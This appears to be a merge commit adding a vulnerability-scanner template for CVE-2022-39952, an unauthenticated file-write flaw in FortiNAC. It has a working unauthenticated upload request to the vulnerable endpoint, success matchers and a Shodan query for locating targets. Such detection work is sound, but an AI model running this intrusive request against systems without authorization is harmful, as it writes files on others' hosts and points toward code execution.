Merge pull request #6780 from dwisiswant0/add/CVE-2022-39952

add CVE-2022-39952
2023-02-24 10:37:38 +05:30 · 2023-02-24 10:37:38 +05:30 · a17a2e40c8
parent 3128dacdf8 86a67544c4
commit a17a2e40c8
1 changed files with 53 additions and 0 deletions
--- a/cves/2022/CVE-2022-39952.yaml
+++ b/cves/2022/CVE-2022-39952.yaml
@ -0,0 +1,53 @@
+id: CVE-2022-39952
+
+info:
+  name: FortiNAC Unauthenticated Arbitrary File Write
+  author: dwisiswant0
+  severity: critical
+  description: |
+    A external control of file name or path in Fortinet FortiNAC versions
+    9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11,
+    8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7
+    may allow an unauthenticated attacker to execute unauthorized code or
+    commands via specifically crafted HTTP request.
+  reference:
+    - https://www.fortiguard.com/psirt/FG-IR-22-300
+    - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
+  remediation: Upgrade to FortiNAC version 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above
+  metadata:
+    verified: "true"
+    shodan-query: title:"FortiNAC"
+  tags: fortinet,fortinac,cve,cve2022,fileupload,rce,intrusive
+
+variables:
+  boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}"
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/configWizard/keyUpload.jsp"
+    headers:
+      Content-Type: "multipart/form-data; boundary={{boundaryId}}"
+    body: |
+      --{{boundaryId}}
+      Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip"
+
+      {{randstr}}
+      --{{boundaryId}}--
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "zipUploadSuccess"
+          - "SuccessfulUpload"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200